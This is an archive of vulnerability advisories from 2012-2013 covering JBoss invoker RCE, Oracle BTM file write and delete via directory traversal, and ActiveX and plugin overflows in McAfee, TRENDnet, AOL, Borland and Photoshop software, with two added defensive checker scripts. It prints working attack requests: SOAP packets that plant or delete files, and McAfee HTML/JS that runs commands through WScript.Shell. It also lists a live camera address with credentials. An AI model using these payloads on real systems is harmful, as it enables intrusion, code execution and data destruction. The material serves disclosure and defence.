EMC Data Protection Advisor DPA Illuminator EJBInvokerServlet Remote Code Execution

2013-12-10 Thread nospam
EMC Data Protection Advisor DPA Illuminator EJBInvokerServlet Remote Code 
Execution 

tested against: Microsoft Windows Server 2008 r2 sp1
EMC Data Protection Advisor 5.8 sp5

vulnerability:
the DPA Illuminator service (DPA_Illuminator.exe) listening
on public ports 8090 (tcp/http) and 8453 (tcp/https) is vulnerable.
It exposes the following servlet:

http://[host]:8090/invoker/EJBInvokerServlet
https://[host]:8453//invoker/EJBInvokerServlet

due to a bundled invoker.war
The result is remote code execution with NT AUTHORITY\SYSTEM
privileges.

proof of concept url:
http://retrogod.altervista.org/9sg_ejb.html

~rgod~


Symantec Workspace Streaming 7.5.0.493 SWS Streamlet Engine Invoker Servlets Remote Code Execution

2013-10-25 Thread nospam
Symantec Workspace Streaming 7.5.0.493 SWS Streamlet Engine Invoker Servlets 
Remote Code Execution

tested against: Microsoft Windows Server 2008 R2 sp1
download url: http://www.symantec.com/it/it/products-solutions/trialware/
file tested: Symantec_Workspace_Streaming_7.5.0.493.zip

vulnerability:
the SWS Streamlet Engine service (as_ste.exe) listening
on public port 9832 (tcp/http) is vulnerable.
It exposes the following servlet 
http://[host]:9832/invoker/EJBInvokerServlet
http://[host]:9832/invoker/JMXInvokerServlet
due to a bundled invoker.sar
The result is remote code execution with NT AUTHORITY\SYSTEM
privileges.

proof of concept url:
http://retrogod.altervista.org/9sg_ejb.html

~rgod~
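
The two posts above (EMC DPA and Symantec SWS) describe the same root cause: a bundled JBoss invoker (invoker.war / invoker.sar) whose EJBInvokerServlet and JMXInvokerServlet are reachable without authentication. The following is an added example, not code from either advisory or from the vendors, showing how a practitioner would confirm exposure of those two paths without sending any payload. It assumes (this is not stated in the posts) that an exposed invoker answers a plain GET with a body beginning with the Java serialization stream magic 0xACED0005 or a Content-Type of application/x-java-serialized-object; the classifier is kept separate from the network call so it can be checked offline.

```python
"""Check a host for exposed JBoss-style /invoker/* servlets.

Added example for the EMC DPA (ports 8090/8453) and Symantec SWS
(port 9832) advisories; not code from those posts.

Assumption (not from the advisories): an exposed invoker servlet replies
to a bare GET with Java serialization data (magic bytes AC ED 00 05)
and/or Content-Type application/x-java-serialized-object. Anything
else is reported as filtered or absent.
"""
import urllib.error
import urllib.request

JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"

# Paths named in the two advisories above.
INVOKER_PATHS = (
    "/invoker/EJBInvokerServlet",
    "/invoker/JMXInvokerServlet",
)


def classify_invoker_response(status, content_type, body):
    """Classify one HTTP response to GET /invoker/<servlet>.

    Returns "exposed" (servlet reachable and speaking Java serialization),
    "absent" (404) or "filtered" (reachable but auth-gated / not serializing).
    """
    if status == 404:
        return "absent"
    if status in (401, 403):
        return "filtered"
    ct = (content_type or "").lower()
    if body[:4] == JAVA_SERIAL_MAGIC or "x-java-serialized-object" in ct:
        return "exposed"
    return "filtered"


def probe_invoker_servlets(base_url, timeout=5):
    """GET each invoker path on base_url (e.g. http://host:8090).

    Network call; returns {path: classification}. Connection-level
    failures (refused, timeout) are reported as "unreachable".
    """
    results = {}
    for path in INVOKER_PATHS:
        url = base_url.rstrip("/") + path
        req = urllib.request.Request(url, headers={"User-Agent": "invoker-check"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                results[path] = classify_invoker_response(
                    resp.status, resp.headers.get("Content-Type"), resp.read(16))
        except urllib.error.HTTPError as e:
            # 4xx/5xx still carry headers and a body worth classifying.
            results[path] = classify_invoker_response(
                e.code, e.headers.get("Content-Type"), e.read(16))
        except (urllib.error.URLError, OSError):
            results[path] = "unreachable"
    return results


if __name__ == "__main__":
    import sys
    for path, verdict in probe_invoker_servlets(sys.argv[1]).items():
        print(f"{path}: {verdict}")
```

Run it as `python invoker_check.py http://[host]:8090` (or `:9832` for SWS). A verdict of "exposed" on either path is enough to treat the host as vulnerable to the unauthenticated invoker deployment described above; the fix is to remove invoker.war/invoker.sar or put the /invoker/* paths behind authentication and a network ACL.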


Borland Caliber 11.0 Quiksoft EasyMail SMTP Object Buffer Overflows

2013-04-26 Thread nospam
Borland Caliber 11.0 Quiksoft EasyMail SMTP Object Buffer Overflows

ActiveX settings:
Binary path: C:\Program Files (x86)\Borland\CaliberRM\emsmtp.dll
Version: 5.0.0.11
ProgID: EasyMail.SMTP.5
CLSID: {4610E7BF-710F-11D3-813D-00C04F6B92D0}
Safe for Scripting: True
Safe for Initialization: True


SubmitToExpress and AddAttachment methods are vulnerable, see CVE-2007-4607
and CVE-2009-4663

//rgod


Borland Silk Central 12.1 TeeChart Pro Activex control AddSeries Remote Code Execution

2013-04-26 Thread nospam
Borland Silk Central 12.1 TeeChart Pro Activex control AddSeries Remote Code 
Execution

ActiveX Settings:
Binary path: C:\Program Files\Silk\Shared Files\teechart.ocx
CLSID: {008BBE7E-C096-11D0-B4E3-00A0C901D681}
ProgID: TeeChart.TChart
Version: 4.0.0.7
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True

AddSeries method is vulnerable, see http://www.osvdb.org/show/osvdb/74446

//rgod


Oracle Business Transaction Management Server FlashTunnelService WriteToFile Message Remote Code Execution

2012-08-07 Thread nospam
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService 
WriteToFile Message Remote Code Execution Exploit

tested against: Microsoft Windows Server 2003 r2 sp2
Oracle WebLogic Server 12c (12.1.1)
Oracle Business Transaction Management Server 12.1.0.2.7 
(Production version)

files tested: 
oepe-indigo-installer-12.1.1.0.1.201203120349-12.1.1-win32.exe (weblogic)
download url: 
http://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html  


BTM_Servers_12.1.0.2.7.zip (BTM, production version) 
download url: 
http://www.oracle.com/technetwork/oem/downloads/btw-downloads-207704.html


vulnerability:
the mentioned product installs a web service 
called FlashTunnelService which can be reached
without prior authentication and processes incoming
SOAP requests.

It can be reached at the following uri:
http://[host]:7001/btmui/soa/flash_svc/

This soap interface exposes the writeToFile function
which could allow to write arbitrary files on the target
server.

Example packet:

POST /btmui/soa/flash_svc/ HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "http://soa.amberpoint.com/writeToFile"
User-Agent: Jakarta Commons-HttpClient/3.1
Host: 192.168.0.1:7001
Content-Length: [length]

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces"
xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types">
   <soapenv:Header/>
   <soapenv:Body>
      <int:writeToFileRequest>
         <int:writeToFile handle="..\..\..\..\..\..\..\..\[path]\somefile.jsp">
            <!--Zero or more repetitions:-->
            <typ:text>[code]</typ:text>
            <!--Optional:-->
            <typ:WriteToFileRequestVersion>
               <!--You may enter ANY elements at this point-->
            </typ:WriteToFileRequestVersion>
         </int:writeToFile>
      </int:writeToFileRequest>
   </soapenv:Body>
</soapenv:Envelope>

the 'handle' property can be used to control the location
of the newly written file (it suffers from a directory traversal vulnerability).
The file extension can also be controlled.
The file content can be controlled through the 'text' element (note that one
must first convert the code to html entities; the soap interface
will convert it back to its original format).

Given this, a remote attacker could place an arbitrary jsp script
inside the main web server root path, then execute arbitrary code
with the privileges of the weblogic installation (usually Administrator
privileges).

vulnerable code, see the decompiled 
com.amberpoint.flashtunnel.impl.FlashTunnelServiceImpl.class

..
public IWriteToFileResponse writeToFile(IWriteToFileRequest request)
    throws SOAPFaultException
{
    WriteToFileResponse wtfr = new WriteToFileResponse();
    String handle = request.getHandle();
    TypedList text = request.getText();
    if(text != null && text.size() > 0)
    {
        File f = getFileFromHandle(handle);
        if(f != null)
            try
            {
                FileOutputStream fos = new FileOutputStream(f);
                OutputStreamWriter osw = new OutputStreamWriter(fos, "UTF-8");
                int i = 0;
                for(int ii = text.size(); i < ii; i++)
                {
                    String s = (String)text.get(i);
                    osw.write(s);
                    osw.write("\n");
                }

                osw.close();
            }
            catch(IOException ex)
            {
                logger.log(Level.SEVERE, (new StringBuilder()).append("IOException writing '").append(f.toString()).append("': ").append(ex.getMessage()).toString());
            }
    }
    return wtfr;
}
..

As attachment, proof of concept code written in php, launch from the command 
line, modify for your own use.

poc: http://retrogod.altervista.org/9sg_ora.htm

rgod


Oracle Business Transaction Management Server FlashTunnelService Remote File Deletion

2012-08-07 Thread nospam
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService 
Remote File Deletion

tested against: Microsoft Windows Server 2003 r2 sp2
Oracle WebLogic Server 12c (12.1.1)
Oracle Business Transaction Management Server 12.1.0.2.7 
(Production version)

files tested: 
oepe-indigo-installer-12.1.1.0.1.201203120349-12.1.1-win32.exe (weblogic)
download url: 
http://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html  


BTM_Servers_12.1.0.2.7.zip (BTM, production version) 
download url: 
http://www.oracle.com/technetwork/oem/downloads/btw-downloads-207704.html


vulnerability:
the mentioned product installs a web service 
called FlashTunnelService which can be reached
without prior authentication and processes incoming
SOAP requests.

It can be reached at the following uri:
http://[host]:7001/btmui/soa/flash_svc/

This soap interface exposes the 'deleteFile' function
which could allow to delete arbitrary files with administrative
privileges on the target
server through a directory traversal vulnerability.
This could be useful for further attacks.

Example packet:

POST /btmui/soa/flash_svc/ HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "http://soa.amberpoint.com/deleteFile"
User-Agent: Jakarta Commons-HttpClient/3.1
Host: [host]:7001
Content-Length: [length]

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces"
xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types">
   <soapenv:Header/>
   <soapenv:Body>
      <int:deleteFileRequest>
         <int:deleteFile handle="../../../../../../../../../../../../somepath/somefile.ext">
            <typ:DeleteFileRequestVersion>
            </typ:DeleteFileRequestVersion>
         </int:deleteFile>
      </int:deleteFileRequest>
   </soapenv:Body>
</soapenv:Envelope>

Vulnerable code, see the decompiled 
com.amberpoint.flashtunnel.impl.FlashTunnelServiceImpl class:
..
public IDeleteFileResponse deleteFile(IDeleteFileRequest request)
    throws SOAPFaultException
{
    DeleteFileResponse dfr = new DeleteFileResponse();
    String handle = request.getHandle();
    File f = getFileFromHandle(handle);
    if(f != null)
        f.delete();
    return dfr;
}
..

As attachment, proof of concept code.

poc: http://retrogod.altervista.org/9sg_ora2.htm

rgod
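
Both FlashTunnelService posts above (writeToFile and deleteFile) hinge on the same missing check: getFileFromHandle() turns the attacker-supplied 'handle' attribute into a File without confining it to a base directory. The block below is an added example, not code from the advisories or from Oracle. It parses SOAP envelopes of the shape shown above (the namespace URIs are the advisory's), extracts the operation and handle, and applies the lexical containment test a hardened getFileFromHandle() or a rule in front of the service needs. Backslashes are treated as separators because the target in the posts is Windows; the embedded request is constructed, not captured.

```python
"""Flag directory traversal in FlashTunnelService 'handle' attributes.

Added example for the writeToFile / deleteFile advisories above; not
code from the posts or from Oracle. Namespace URIs are from the posts.
The sample request at the bottom is constructed.
"""
import posixpath
import xml.etree.ElementTree as ET

NS = {
    "soapenv": "http://schemas.xmlsoap.org/soap/envelope/",
    "int": "http://schemas.amberpoint.com/flashtunnel/interfaces",
}

# Operations the advisories show taking a file handle.
HANDLE_OPS = ("writeToFile", "deleteFile")


def normalize_handle(handle):
    """Collapse a handle to a POSIX-style path, lexically.

    Backslashes count as separators (the service runs on Windows in the
    posts) and '.'/'..' segments are resolved without touching the
    filesystem: '..\\..\\x\\y.jsp' -> '../../x/y.jsp', 'a/./b' -> 'a/b'.
    """
    return posixpath.normpath(handle.replace("\\", "/"))


def handle_escapes_base(handle):
    """True if the handle would resolve outside the handle directory.

    Rejects absolute paths (leading '/' or a drive letter) and any path
    that still starts with '..' after normalization. This is the check
    the decompiled getFileFromHandle() caller lacks.
    """
    norm = normalize_handle(handle)
    if norm.startswith("/") or (len(norm) > 1 and norm[1] == ":"):
        return True
    return norm == ".." or norm.startswith("../")


def extract_handles(soap_xml):
    """Return [(operation, handle)] for every handle-taking op in the Body."""
    root = ET.fromstring(soap_xml)
    body = root.find("soapenv:Body", NS)
    found = []
    if body is None:
        return found
    for op in HANDLE_OPS:
        for el in body.iter("{%s}%s" % (NS["int"], op)):
            handle = el.get("handle")
            if handle is not None:
                found.append((op, handle))
    return found


def audit_request(soap_xml):
    """Classify one SOAP request: [(op, handle, 'TRAVERSAL' | 'ok')]."""
    return [(op, h, "TRAVERSAL" if handle_escapes_base(h) else "ok")
            for op, h in extract_handles(soap_xml)]


# Constructed sample shaped like the deleteFile packet in the advisory.
SAMPLE_DELETE = """<soapenv:Envelope
  xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
  xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces"
  xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types">
  <soapenv:Header/>
  <soapenv:Body>
    <int:deleteFileRequest>
      <int:deleteFile handle="../../../../../../somepath/somefile.ext">
        <typ:DeleteFileRequestVersion/>
      </int:deleteFile>
    </int:deleteFileRequest>
  </soapenv:Body>
</soapenv:Envelope>"""

if __name__ == "__main__":
    for op, handle, verdict in audit_request(SAMPLE_DELETE):
        print(f"{op} handle={handle!r}: {verdict}")
```

The containment test is deliberately lexical: it does not need the base directory to exist and so can run on a proxy or in a log parser, and it treats a drive letter as absolute, which a POSIX-only normpath would miss. A server-side fix should additionally resolve the final path with the filesystem (canonical path) and compare it against the canonical base directory, so that symlinks and case differences cannot defeat the string check.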


AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution

2012-08-06 Thread nospam
AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution

tested against: Microsoft Windows Vista sp2
Microsoft Windows Server 2003 r2 sp2
Mozilla Firefox 14.0.1
   
download url: 
http://client.web.aol.com/toolbarfiles/Prod/downloads/downloadupdater/dnupdatersetup.exe
(this was the update for a previous vulnerability, see ZDI-12-098)

see also the installer aol_toolbar_pricecheck.exe
url: 
http://toolbar.aol.com/download_files/download-helper.html?brand=aola=111ncid=txtlnkusdown0043

vulnerability:
the mentioned product installs a Firefox plugin:

File: npdnupdater2.dll
Version: 1.3.0.0
Name: npdnupdater2
Path: C:\Program Files\Mozilla Firefox\plugins\npdnupdater2.dll
Mime type: applicatiotn/x-vend.aol.dnupdater2.1
Extension: ocp

By embedding this plugin inside an html page
it is possible to trigger a buffer overflow vulnerability
through the 'SRC' parameter.

Example crash:

EAX 
ECX 01101470
EDX 01135208 ASCII 

EBX 
ESP 0013F618
EBP 0013F634
ESI 0002
EDI 0013F668
EIP 61616161

C 1  ES 0023 32bit 0()
P 1  CS 001B 32bit 0()
A 1  SS 0023 32bit 0()
Z 0  DS 0023 32bit 0()
S 1  FS 003B 32bit 7FFDD000(4000)
T 0  GS  NULL
D 0
O 0  LastErr  ERROR_SUCCESS
EFL 0297 (NO,B,NE,BE,S,PE,L,LE)

ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 8.000
ST7 empty 0.250 CONST 1/4.
   3 2 1 0  E S P U O Z D I
FST 0120  Cond 0 0 0 1  Err 0 0 1 0 0 0 0 0 (LT)
FCW 027F  Prec NEAR,53  Mask1 1 1 1 1 1
Last cmnd 001B:10571FBD xul.10571FBD

XMM0    
XMM1 61616161 61616161 61616161 61616161
XMM2 61616161 61616161 61616161 61616161
XMM3 61616161 61616161 61616161 61616161
XMM4 61616161 61616161 61616161 61616161
XMM5 61616161 61616161 61616161 61616161
XMM6 61616161 61616161 61616161 61616161
XMM7 61616161 61616161 61616161 61616161
P U O Z D I
MXCSR 1F80  FZ 0 DZ 0  Err  0 0 0 0 0 0
Rnd NEAR   Mask 1 1 1 1 1 1

EIP is overwritten, also EDX points to user-supplied code (this can 
be done by setting an overlong fake parameter, see poc).

As attachment, proof of concept code.

a copy loop [*] is involved
in overwriting a certain memory region. The subsequent code can be used
to call inside this memory region [**].

See npdnupdater2.dll:

CPU Disasm
Address   Hex dump  Command  Comments
01A91C10  /$  55PUSH EBP ; 
npdnupdater2.01A91C10(guessed Arg1)
01A91C11  |.  56PUSH ESI
01A91C12  |.  8BE9  MOV EBP,ECX
01A91C14  |.  57PUSH EDI
01A91C15  |.  8B7C24 10 MOV EDI,DWORD PTR SS:[ARG.1]
01A91C19  |.  C745 00 9CA2A MOV DWORD PTR SS:[EBP],OFFSET 01A9A29C
01A91C20  |.  8B07  MOV EAX,DWORD PTR DS:[EDI]
01A91C22  |.  33F6  XOR ESI,ESI
01A91C24  |.  8945 04   MOV DWORD PTR SS:[EBP+4],EAX
01A91C27  |.  C645 08 00MOV BYTE PTR SS:[EBP+8],0
01A91C2B  |.  C745 10 0 MOV DWORD PTR SS:[EBP+10],0
01A91C32  |.  66:3977 0ACMP WORD PTR DS:[EDI+0A],SI
01A91C36  |.  7E 3E JLE SHORT 01A91C76
01A91C38  |.  EB 06 JMP SHORT 01A91C40
01A91C3A  |   8D9B  LEA EBX,[EBX]
01A91C40  |  8B4F 0C   /MOV ECX,DWORD PTR DS:[EDI+0C]
01A91C43  |.  8B14B1|MOV EDX,DWORD PTR DS:[ESI*4+ECX]
01A91C46  |.  68 D4A2A901   |PUSH OFFSET 01A9A2D4; /Arg2 = 
ASCII SRC
01A91C4B  |.  52|PUSH EDX; |Arg1
01A91C4C  |.  E8 E06F   |CALL 01A98C31- ; 
\npdnupdater2.01A98C31
01A91C51  |.  83C4 08   |ADD ESP,8
01A91C54  |.  85C0  |TEST EAX,EAX
01A91C56  |.  75 15 |JNE SHORT 01A91C6D
01A91C58  |.  8B47 10   |MOV EAX,DWORD PTR DS:[EDI+10]
01A91C5B  |.  8B0CB0|MOV ECX,DWORD PTR DS:[ESI*4+EAX]
01A91C5E  |.  BA 38CCA901   |MOV EDX,OFFSET 01A9CC38 ; ASCII 
...
01A91C63  |  8A01  |/MOV AL,BYTE PTR DS:[ECX] - [*]
01A91C65  |.  41||INC ECX
01A91C66  |.  8802  ||MOV BYTE PTR DS:[EDX],AL
01A91C68  |.  42||INC EDX
01A91C69  |.  84C0  ||TEST AL,AL
01A91C6B  |.^ 75 F6 |\JNE SHORT 01A91C63
01A91C6D  |  0FBF4F 0A |MOVSX ECX,WORD PTR DS:[EDI+0A]
01A91C71  |.  46|INC ESI
01A91C72  |.  3BF1  |CMP ESI,ECX
01A91C74  |.^ 7C CA \JL SHORT 01A91C40
01A91C76  |  5FPOP EDI
01A91C77  |.  5EPOP ESI
01A91C78  |.  8BC5  MOV EAX,EBP
01A91C7A  |.  5DPOP EBP
01A91C7B  \.  C2 0400   RETN 4
01A91C7E  CCINT3

Adobe Photoshop CS5.1 U3D.8BI Library Collada Asset Elements Stack Based Buffer Overflow Vulnerability

2012-05-11 Thread nospam
Adobe Photoshop CS5.1 U3D.8BI Library Collada Asset Elements Stack Based Buffer 
Overflow Vulnerability 

download url of a test version: 
http://www.adobe.com/cfusion/tdrc/index.cfm?product=photoshop


Note:
Found three weeks before the CS6 release.
I could not reproduce against CS6, cannot say if there is
a CVE for this; I think it is also possible they patched it silently.
However this leaves a lot of Photoshop installations vulnerable.


vulnerability:
A buffer overflow exists in the way Photoshop parses
Collada (*.DAE) asset elements, example file:

..
<?xml version="1.0"?>
<COLLADA xmlns="http://www.collada.org/2005/11/COLLADASchema" version="1.4.1">
<asset>
<contributor>
<author>rgod</author>
<authoring_tool>Maya 8.0 | ColladaMaya v3.02 | FCollada v3.2</authoring_tool>
<comments>Collada Maya Export Options:
bakeTransforms=0;exportPolygonMeshes=1;bakeLighting=0;isSampling=0;
curveConstrainSampling=0;exportCameraAsLookat=0;
exportLights=1;exportCameras=1;exportJointsAndSkin=1;
exportAnimations=1;exportTriangles=1;exportInvisibleNodes=0;
exportNormals=1;exportTexCoords=1;exportVertexColors=1;exportTangents=0;
exportTexTangents=0;exportConstraints=1;exportPhysics=0;exportXRefs=1;
dereferenceXRefs=0;cameraXFov=0;cameraYFov=1...
</comments>
..

While trying to convert the element field from ASCII to Unicode
the U3D.8BI library plugin does a miscalculation
in allocating a buffer for the user-supplied string,
then overwrites the stack with the user-controlled buffer. Critical structures
are overwritten (SEH); also the arguments of a subsequent memcpy()
are user-controlled.



vulnerable code, these routines in u3d.8bi (this is repeated one time for
each byte of the string), run trace:

..
10A05C30   55   pushebp
10A05C31   8BEC mov ebp, esp
10A05C33   83EC 10  sub esp, 10
10A05C36   8B45 08  mov eax, dword ptr ss:[ebp+8]
10A05C39   0345 0C  add eax, dword ptr ss:[ebp+C]
10A05C3C   8945 F8  mov dword ptr ss:[ebp-8], eax
10A05C3F   8B4D 0C  mov ecx, dword ptr ss:[ebp+C]
10A05C42   894D F4  mov dword ptr ss:[ebp-C], ecx
10A05C45   8B55 F4  mov edx, dword ptr ss:[ebp-C]
10A05C48   83EA 01  sub edx, 1
10A05C4B   8955 F4  mov dword ptr ss:[ebp-C], edx
10A05C4E   837D F4 03   cmp dword ptr ss:[ebp-C], 3
10A05C52   77 0Aja  short U3D.10A05C5E
10A05C54   8B45 F4  mov eax, dword ptr ss:[ebp-C]
10A05C57   FF2485 A45DA010  jmp dword ptr ds:[eax*4+10A05DA4]
..

..
10A05D6A   8B4D 08  mov ecx, dword ptr ss:[ebp+8]
10A05D6D   0FB611   movzx   edx, byte ptr ds:[ecx]
10A05D70   81FA 8000cmp edx, 80
10A05D76   7C 12jl  short U3D.10A05D8A
10A05D78   8B45 08  mov eax, dword ptr ss:[ebp+8]
10A05D7B   0FB608   movzx   ecx, byte ptr ds:[eax]
10A05D7E   81F9 C200cmp ecx, 0C2
10A05D84   7D 04jge short U3D.10A05D8A
10A05D86   32C0 xor al, al
10A05D88   EB 13jmp short U3D.10A05D9D
10A05D8A   8B55 08  mov edx, dword ptr ss:[ebp+8]
10A05D8D   0FB602   movzx   eax, byte ptr ds:[edx]
10A05D90   3D F400  cmp eax, 0F4
10A05D95   7E 04jle short U3D.10A05D9B
10A05D97   32C0 xor al, al
10A05D99   EB 02jmp short U3D.10A05D9D
10A05D9B   B0 01mov al, 1
10A05D9D   8BE5 mov esp, ebp
10A05D9F   5D   pop ebp
10A05DA0   C3   retn
..

..
10A05E4B   83C4 08  add esp, 8
10A05E4E   0FB6D0   movzx   edx, al
10A05E51   85D2 testedx, edx
10A05E53   75 0Cjnz short U3D.10A05E61
10A05E55   C745 F8 0300 mov dword ptr ss:[ebp-8], 3
10A05E5C   E9 1502  jmp U3D.10A06076
10A05E61   0FB745 F0movzx   eax, word ptr ss:[ebp-10]
10A05E65   8945 E8  mov dword ptr ss:[ebp-18], eax
10A05E68   837D E8 05   cmp dword ptr ss:[ebp-18], 5
10A05E6C   0F87 B500ja  U3D.10A05F27
10A05E72   8B4D E8  mov ecx, dword ptr ss:[ebp-18]
10A05E75   FF248D 9060A010  jmp dword ptr ds:[ecx*4+10A06090]
..

..
10A05F12   8B4D F4  mov ecx, dword ptr ss:[ebp-C]
10A05F15   0FB611   movzx   edx, byte ptr ds:[ecx]
10A05F18   0355 EC  add edx, dword ptr ss:[ebp-14]
10A05F1B   8955 EC  mov dword ptr ss:[ebp-14], edx
10A05F1E   8B45 F4  mov eax, dword ptr ss:[ebp-C]
10A05F21   83C0 01  add eax, 1
10A05F24   8945 F4  mov dword ptr ss:[ebp-C], eax
10A05F27   0FB74D F0movzx   ecx, word ptr ss:[ebp-10]
10A05F2B   8B55 EC  mov edx, dword ptr ss:[ebp-14]
10A05F2E   2B148D 5034B110  sub edx, dword ptr ds:[ecx*4+10B1345
10A05F35   8955 EC  mov 

McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX Control GetObject() Security Bypass Remote Code Execution Vulnerability

2012-04-30 Thread nospam
McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX Control
GetObject() Security Bypass Remote Code Execution Vulnerability

tested against: Microsoft Windows Vista sp2
Microsoft Windows 2003 r2 sp2
Internet Explorer 7/8/9

  

product homepage: 
http://www.mcafee.com/it/downloads/free-tools/virtual-technician.aspx

file tested: MVTInstaller.exe

background:

the mentioned product installs an ActiveX control with
the following settings:

Binary path: C:\Program Files\McAfee\Supportability\MVT\MVT.dll
ProgID: MVT.MVTControl.6300
CLSID: {2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): false

According to the IObjectSafety interface, this control is
safe for scripting, so Internet Explorer will allow
scripting from remote.

Vulnerability:

this control offers the vulnerable GetObject() function,
see typelib:

..
/* DISPID=3 */
/* VT_VARIANT [12] */
function GetObject(
/* VT_VARIANT [12] [in] */ $in_dwObjectID
)
{
/* method GetObject */
}
..

By specifying the ProgID of an arbitrary class from
the underlying operating system, with no regard for browser security,
it is possible to load e.g. the WScript.Shell class.
The returned object then offers the Exec() method
which can be used to launch operating system commands.

Example of attack:

<object classid='clsid:2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF' id='obj' />
</object>
<script defer="defer">
var x = obj.GetObject("WScript.Shell");
x.Exec("cmd /c start calc");
</script>


it is also possible to crash the browser 
by specifying an arbitrary memory address


<object classid='clsid:2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF' id='obj' />
</object>
<script defer="defer">
var x = obj.GetObject(0x0c0c0c0c);
</script>


example crash:
eax=0c0c0c0c ebx=0197085c ecx=01b5efec edx=008e esi=01b5efec edi=01b5f344
eip=77bd8efa esp=01b5ef80 ebp=01b5ef80 iopl=0 nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00010206
msvcrt!wcslen+0x8:
77bd8efa 668b08  mov cx,word ptr [eax]ds:0023:0c0c0c0c=

the debugger shows an access violation while reading 0x0c0c0c0c;
this could also be exploitable but was not demonstrated at the time of this report.

As attachment, proof of concept code which executes calc.exe, then crash IE.



additional note:
0:010 lm -vm mvt
start    end        module name
0345 034b8000   MVT(deferred) 
Image path: D:\Program Files\McAfee\Supportability\MVT\MVT.dll
Image name: MVT.dll
Timestamp:Thu Jan 12 07:37:26 2012 (4F0E7FA6)
CheckSum: 0006C308
ImageSize:00068000
File version: 6.3.0.1911
Product version:  6.3.0.1911
File flags:   0 (Mask 3F)
File OS:  4 Unknown Win32
File type:2.0 Dll
File date:.
Translations: 0409.04e4
CompanyName:  McAfee, Inc.
ProductName:  McAfee Virtual Technician
InternalName: MVT.dll
OriginalFilename: MVT.dll
ProductVersion:   6.3.0.1911
FileVersion:  6.3.0.1911
FileDescription:  McAfee, Inc.
LegalCopyright:   ©2011 McAfee, Inc. All Rights Reserved.


//rgod

original url: http://retrogod.altervista.org/9sg_mcafee_vt_adv.htm
poc: http://retrogod.altervista.org/9sg_mcafee_vt_ax.htm


TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow

2012-03-28 Thread nospam
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX
Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow

camera demo
http://67.203.184.58:9193/admin/view.cgi?profile=0
username=guest
password=guest


Background:
The mentioned product, when browsing the device web interface,
asks to install an ActiveX control to stream video content.
It has the following settings:

File version: 1, 1, 52, 18
Product name: UltraMJCam device ActiveX Control
Binary path: C:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocx
ProgID: UltraMJCam.UltraMJCam.1
CLSID: {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11}
Implements IObjectSafety: yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True


Vulnerability:
This ActiveX control exposes the vulnerable
OpenFileDlg() method, see typelib:

..
/* DISPID=101 */
/* VT_BSTR [8] */
function OpenFileDlg(
/* VT_BSTR [8] [in] */ $sFilter
)
{
/* method OpenFileDlg */
}
..

By invoking this method with an overlong argument it is possible
to overflow a buffer. This is because of an insecure
WideCharToMultiByte() call inside UltraMJCamX.ocx:


Call stack of main thread
AddressStack  Procedure / arguments 
  
Called from   Frame
001279FC   77E6F20B   kernel32.77E637DE 
  
kernel32.77E6F206 00127A0C
00127A10   0299F958   kernel32.WideCharToMultiByte  
  
UltraMJC.0299F952 00127A0C
00127A14   0003 CodePage = 3
00127A18    Options = 0
00127A1C   03835C5C WideCharStr = 

00127A20    WideCharCount =  (-1.)
00127A24   00127A50 MultiByteStr = 00127A50
00127A28   7532 MultiByteCount = 7532 (30002.)
00127A2C    pDefaultChar = NULL
00127A30    pDefaultCharUsed = NULL
00127A3C   029B11D0   UltraMJC.0299F920 
  
UltraMJC.029B11CB 00127A38


..
0299F934   8B45 08  mov eax,dword ptr ss:[ebp+8]
0299F937   C600 00  mov byte ptr ds:[eax],0
0299F93A   6A 00push 0
0299F93C   6A 00push 0
0299F93E   8B4D 10  mov ecx,dword ptr ss:[ebp+10]
0299F941   51   push ecx
0299F942   8B55 08  mov edx,dword ptr ss:[ebp+8]
0299F945   52   push edx
0299F946   6A FFpush -1
0299F948   8B45 0C  mov eax,dword ptr ss:[ebp+C]
0299F94B   50   push eax
0299F94C   6A 00push 0
0299F94E   8B4D 14  mov ecx,dword ptr ss:[ebp+14]
0299F951   51   push ecx
0299F952   FF15 20319F02call dword ptr ds:[KERNEL32.WideCharTo; 
kernel32.WideCharToMultiByte 
..

The result is that critical structures are overwritten (SEH)
allowing to execute arbitrary code against the target browser.
 
As attachment, basic proof of concept code.

original url: http://retrogod.altervista.org/9sg_trendnet_adv.htm

poc: http://retrogod.altervista.org/9sg_trendnet_poc.htm


